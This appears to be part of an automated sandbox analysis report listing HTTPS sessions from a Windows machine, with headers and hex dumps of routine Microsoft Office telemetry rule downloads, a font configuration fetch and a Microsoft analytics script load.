                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  87192.168.2.74980513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:01 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1952
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                  x-ms-request-id: abed2815-c01e-0046-0275-3d2db9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185301Z-15b8b599d885ffrhhC1TEBtuv0000000039000000000pesc
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:01 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  88192.168.2.74980913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:01 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:01 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2592
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                  x-ms-request-id: a1633192-d01e-007a-5c27-3df38c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185301Z-174c587ffdftjz9shC1TEBsh98000000037g000000006qgu
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:01 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  89192.168.2.7498122.18.109.164443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:02 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                  2024-11-23 18:53:02 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Server: Kestrel
                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                  X-Ms-Region: prod-eus-z1
                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                  X-OSID: 2
                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                  X-CCC: GB
                                                                                                                                                                                  Cache-Control: public, max-age=225593
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:02 GMT
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  X-CID: 2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  90192.168.2.74981313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:03 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 3342
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                  ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                  x-ms-request-id: 21def030-601e-0084-7c7b-3b6b3f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185303Z-174c587ffdfn4nhwhC1TEB2nbc00000003bg00000000gb2q
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:03 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  91192.168.2.74981513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:03 UTC191OUTGET /rules/rule90401v3s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1250
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDE4487AA"
                                                                                                                                                                                  x-ms-request-id: 6fe4cd85-501e-0029-2ea1-3ad0b8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185303Z-174c587ffdf59vqchC1TEByk6800000003h000000000658s
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:03 UTC1250INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 39 30 34 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 4d 65 74 61 64 61 74 61 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="90401" V="3" DC="ESM" EN="Office.Telemetry.SamplingPolicy" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" DL="A" DCa="PSP PSU" xmlns=""> <RIS> <RI N="Metadata" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  92192.168.2.74981413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:03 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 2284
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                  ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                  x-ms-request-id: 1a818a33-b01e-005c-4475-3b4c66000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185303Z-174c587ffdfmrvb9hC1TEBtn3800000003b000000000azcy
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:03 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  93192.168.2.74981613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:03 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1393
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                  x-ms-request-id: 6e9ce571-001e-005a-0843-3cc3d0000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185303Z-15b8b599d889fz52hC1TEB59as00000003b0000000007554
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:03 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  94192.168.2.74981713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:03 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1356
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                  x-ms-request-id: e3da2723-301e-0051-6021-3d38bb000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185303Z-178bfbc474bscnbchC1NYCe7eg00000004z000000000dp9u
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  95192.168.2.7498182.18.109.164443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:04 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                  2024-11-23 18:53:04 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                  Cache-Control: public, max-age=225617
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:04 GMT
                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                  2024-11-23 18:53:04 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  96192.168.2.74982113.107.246.634437964C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:05 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                  Host: js.monitor.azure.com
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                  Referer: https://learn.microsoft.com/
                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                  2024-11-23 18:53:05 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:05 GMT
                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                  Content-Length: 207935
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                  Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                  ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                  x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                  x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                  x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  x-azure-ref: 20241123T185305Z-174c587ffdfp4vpjhC1TEBybqw00000003c000000000742h
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache-Info: L2_T1
                                                                                                                                                                                  X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:05 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
